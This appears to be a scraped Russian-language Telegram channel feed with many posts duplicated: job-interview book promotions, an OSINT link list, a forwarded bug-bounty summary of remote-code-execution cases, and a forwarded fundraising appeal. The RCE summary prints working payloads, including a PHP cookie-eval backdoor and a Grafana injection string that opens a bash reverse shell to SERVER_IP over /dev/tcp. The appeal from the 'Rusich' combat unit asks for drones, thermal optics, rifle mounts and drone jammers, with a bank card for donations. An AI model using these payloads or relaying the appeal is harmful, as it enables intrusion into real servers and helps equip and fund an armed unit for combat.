Собеседование на английском проще простого, Наталья Дриго, 2016
Я собирала материал для этой книги много лет, так как английский и бизнес неразлучны в моей жизни. Я лингвист, но работаю в сфере финансов уже больше 10 лет. Проходила собеседования сама, проводила собеседования, подбирая подчиненных, подготавливала друзей к собеседованиям. В моем кругу друзей: рекрутеры, топ-менеджеры и сотрудники HR-департаментов. Поэтому и не случайно у меня возникла в голове идея создания этой книги-подсказки-шпаргалки.
Наслаждайтесь, пользуйтесь, развивайтесь!
#english #job
Я собирала материал для этой книги много лет, так как английский и бизнес неразлучны в моей жизни. Я лингвист, но работаю в сфере финансов уже больше 10 лет. Проходила собеседования сама, проводила собеседования, подбирая подчиненных, подготавливала друзей к собеседованиям. В моем кругу друзей: рекрутеры, топ-менеджеры и сотрудники HR-департаментов. Поэтому и не случайно у меня возникла в голове идея создания этой книги-подсказки-шпаргалки.
Наслаждайтесь, пользуйтесь, развивайтесь!
#english #job
👍1
Собеседование_на_английском_проще_простого,_Наталья_Дриго,_2016.pdf
1.2 MB
Собеседование на английском проще простого, Наталья Дриго, 2016
🔥1
Батл с кадровиком. Как пройти собеседование и выполнить все тесты, Ричард Борзов, 2018
Согласно одному из исследований Высшей школы экономики, 22,1 % россиян ежегодно меняют работу. Это означает, что каждый год количество соискателей превышает 31 млн человек. Такая внушительная цифра заставляет HR-менеджеров ответственнее подходить к подбору персонала и устраивать кандидатам настоящий «марафон». Телефонное интервью, стресс-интервью, деловые игры, презентации, психологические тесты и еще с десяток методик – всё это используют кадровики, чтобы выбрать одного из сотни претендентов.
«Батл с кадровиком» – практическое пособие для соискателей. Ричард Борзов, карьерный консультант с многолетним опытом, рассказывает в книге, как HR-менеджеры оценивают и отбирают резюме; приводит примеры удачных ответов на собеседованиях и решения числовых и вербальных тестов; дает описание компетенций, которые следует проявить кандидату в упражнениях на ассесмент-центрах.
#book #job
Согласно одному из исследований Высшей школы экономики, 22,1 % россиян ежегодно меняют работу. Это означает, что каждый год количество соискателей превышает 31 млн человек. Такая внушительная цифра заставляет HR-менеджеров ответственнее подходить к подбору персонала и устраивать кандидатам настоящий «марафон». Телефонное интервью, стресс-интервью, деловые игры, презентации, психологические тесты и еще с десяток методик – всё это используют кадровики, чтобы выбрать одного из сотни претендентов.
«Батл с кадровиком» – практическое пособие для соискателей. Ричард Борзов, карьерный консультант с многолетним опытом, рассказывает в книге, как HR-менеджеры оценивают и отбирают резюме; приводит примеры удачных ответов на собеседованиях и решения числовых и вербальных тестов; дает описание компетенций, которые следует проявить кандидату в упражнениях на ассесмент-центрах.
#book #job
Батл с кадровиком.pdf
2.9 MB
Батл с кадровиком. Как пройти собеседование и выполнить все тесты, Ричард Борзов, 2018
🔥2
Forwarded from ДШРГ Русич 🇷🇺
Всем здравия! ДШРГ Русич продолжает выполнение задач на Запорожском направлении несмотря ни на что.
Для продолжения работы на максимальном уровне группе требуется ваша помощь в оснащении оборудованием, не входящим в перечень выдаваемого по линии Минобороны:
- Автомобиль Нива с обвесом и лебедкой.
- Квадрокоптеры Мавик 3 PRO - 2 штуки (расходник который постоянно или глушат РЭБ или сбивают, а на них идёт основная работа днем)
- Двухканальный бинокль с дальномером на охлаждаемой матрице или аналогичный прибор на микроболометре по типу iRay xFuse.
- Тренога для винтовки и бинокля типо Leofoto SO 362
- Крепление (голова) под винтовку и под бинокль MAB-75 с быстрым зажимом
- Метеостанция Kestrel 5700 Elite Link.
- Для обеспечения тренировчного процесса группы и подразделения в штате которого состоим гонги из бронестали типо Хардекс 500 или аналогичной 5ХНМ с термообработкой толщиной 6 мм (3 круга диаметром 25 см, 3 круга диаметром 35 см, 3 грудные мишени номер 4) со стойками.
- Бинокуляр (очки) ночного видения для вождения транспорта типо NVGA - 15,bnvd1431 или Lindu pvs 31
- Инфракрасные фары на ТС, 2 шт.
- Цифровой ретранслятор Hyitera или ZTE.
- Подавитель для дронов на автомобиль по типу "Волнорез", 2 шт.
Также просим помощи на
обслуживание и ремонт имеющегося автомобильного транспорта (например замена пробитого осколком интеркулера за 30 тысяч, ТО, запчасти и другое).
Будем благодарны принять вашу помощь как в натуральном виде (по договорённости человек от нас может временно оттянуться с направления и забрать груз в тылу зоны СВО или в РФ), так и в финансовой форме.
Актуальные реквизиты подразделения:
2202206332014773 сбербанк
тинькофф - заблокирован
Благодарим каждого из вас за помощь.
Победа будет за нами. Слава России
Командир группы "Серб"
Для продолжения работы на максимальном уровне группе требуется ваша помощь в оснащении оборудованием, не входящим в перечень выдаваемого по линии Минобороны:
- Автомобиль Нива с обвесом и лебедкой.
- Квадрокоптеры Мавик 3 PRO - 2 штуки (расходник который постоянно или глушат РЭБ или сбивают, а на них идёт основная работа днем)
- Двухканальный бинокль с дальномером на охлаждаемой матрице или аналогичный прибор на микроболометре по типу iRay xFuse.
- Тренога для винтовки и бинокля типо Leofoto SO 362
- Крепление (голова) под винтовку и под бинокль MAB-75 с быстрым зажимом
- Метеостанция Kestrel 5700 Elite Link.
- Для обеспечения тренировчного процесса группы и подразделения в штате которого состоим гонги из бронестали типо Хардекс 500 или аналогичной 5ХНМ с термообработкой толщиной 6 мм (3 круга диаметром 25 см, 3 круга диаметром 35 см, 3 грудные мишени номер 4) со стойками.
- Бинокуляр (очки) ночного видения для вождения транспорта типо NVGA - 15,bnvd1431 или Lindu pvs 31
- Инфракрасные фары на ТС, 2 шт.
- Цифровой ретранслятор Hyitera или ZTE.
- Подавитель для дронов на автомобиль по типу "Волнорез", 2 шт.
Также просим помощи на
обслуживание и ремонт имеющегося автомобильного транспорта (например замена пробитого осколком интеркулера за 30 тысяч, ТО, запчасти и другое).
Будем благодарны принять вашу помощь как в натуральном виде (по договорённости человек от нас может временно оттянуться с направления и забрать груз в тылу зоны СВО или в РФ), так и в финансовой форме.
Актуальные реквизиты подразделения:
2202206332014773 сбербанк
тинькофф - заблокирован
Благодарим каждого из вас за помощь.
Победа будет за нами. Слава России
Командир группы "Серб"
❤8
Ultimate OSINT Collection
News & blogs
Newsletters
Books
How-to guides
CTFs
Podcasts
Tools collections
and more.
https://start.me/p/DPYPMz/the-ultimate-osint-collection
Contributor twitter.com/hatless1der
News & blogs
Newsletters
Books
How-to guides
CTFs
Podcasts
Tools collections
and more.
https://start.me/p/DPYPMz/the-ultimate-osint-collection
Contributor twitter.com/hatless1der
Forwarded from #Arm1tage
Remote Code Execution | Command Injection
RCE сложная и проворная уязвимость, которую хер так просто найдешь при багбаунти или АпСеке. Попался на глаза вот такой ролик, где чувак рассказывает про случаи инъекций команд, в каких местах они вызываются и как находятся. Я решил просто расписать коротко каждый случай из видео с прикрепленным к нему статьей/РоС-ом, чтобы не долбаться каждый раз и не пересматривать видос.
1. Сложная RCE через миграцию GitLab репозиториев с одного инстанса на другой. РоС.
2. /.git/config раскрывает ключ, который можно использовать для выполнения команд на сервере. Статья.
3. Выполнение команд прямо через куки на сервере с PHP (Статья):
4. Сервер на Руби при фаззинге параметров выдает ошибку через Rack и палит секрет для подписи куки. С помощью этого секрета создаем свой сериализованный объект с РЦЕ внутри. Статья.
5. RCE через CSRF на ажур, с интересным обходом проверки Origin (Статья):
6. Классическая SSTI на uber через имя профиля с отрабатыванием кода в письме. PoC.
7. RCE через SQL инъекцию. PoC.
8. Dependency Confusion. Об этом типе атак я делал пост ранее.
9. 0day уязвимости: Secure VPN.
10. RCE через картинки: ExifTool.
11. RCE через инъекцию опций в git.
12. Инъекция в параметр СМТП сервера на Grafana. РоС.
14 Потенциальная RCE через генерацию PDF файлов с использованием headless Chromium. Репорт.
#rce
RCE сложная и проворная уязвимость, которую хер так просто найдешь при багбаунти или АпСеке. Попался на глаза вот такой ролик, где чувак рассказывает про случаи инъекций команд, в каких местах они вызываются и как находятся. Я решил просто расписать коротко каждый случай из видео с прикрепленным к нему статьей/РоС-ом, чтобы не долбаться каждый раз и не пересматривать видос.
1. Сложная RCE через миграцию GitLab репозиториев с одного инстанса на другой. РоС.
2. /.git/config раскрывает ключ, который можно использовать для выполнения команд на сервере. Статья.
3. Выполнение команд прямо через куки на сервере с PHP (Статья):
{$_COOKIE['c'] .= ';';eval($_COOKIE['c']);exit;}4. Сервер на Руби при фаззинге параметров выдает ошибку через Rack и палит секрет для подписи куки. С помощью этого секрета создаем свой сериализованный объект с РЦЕ внутри. Статья.
5. RCE через CSRF на ажур, с интересным обходом проверки Origin (Статья):
https://<my-webapp>.scm.azurewebsites.net._.<attacker-site>./6. Классическая SSTI на uber через имя профиля с отрабатыванием кода в письме. PoC.
7. RCE через SQL инъекцию. PoC.
8. Dependency Confusion. Об этом типе атак я делал пост ранее.
9. 0day уязвимости: Secure VPN.
10. RCE через картинки: ExifTool.
11. RCE через инъекцию опций в git.
12. Инъекция в параметр СМТП сервера на Grafana. РоС.
"password": "x\r\n[plugin.grafana-image-renderer]\r\nrendering_args=--renderer-cmd-prefix=bash -c bash$IFS-l$IFS>$IFS/dev/tcp/SERVER_IP/4444$IFS0<&1$IFS2>&1"
13. Классический RCE через SSRF через Gopher. Статья.14 Потенциальная RCE через генерацию PDF файлов с использованием headless Chromium. Репорт.
#rce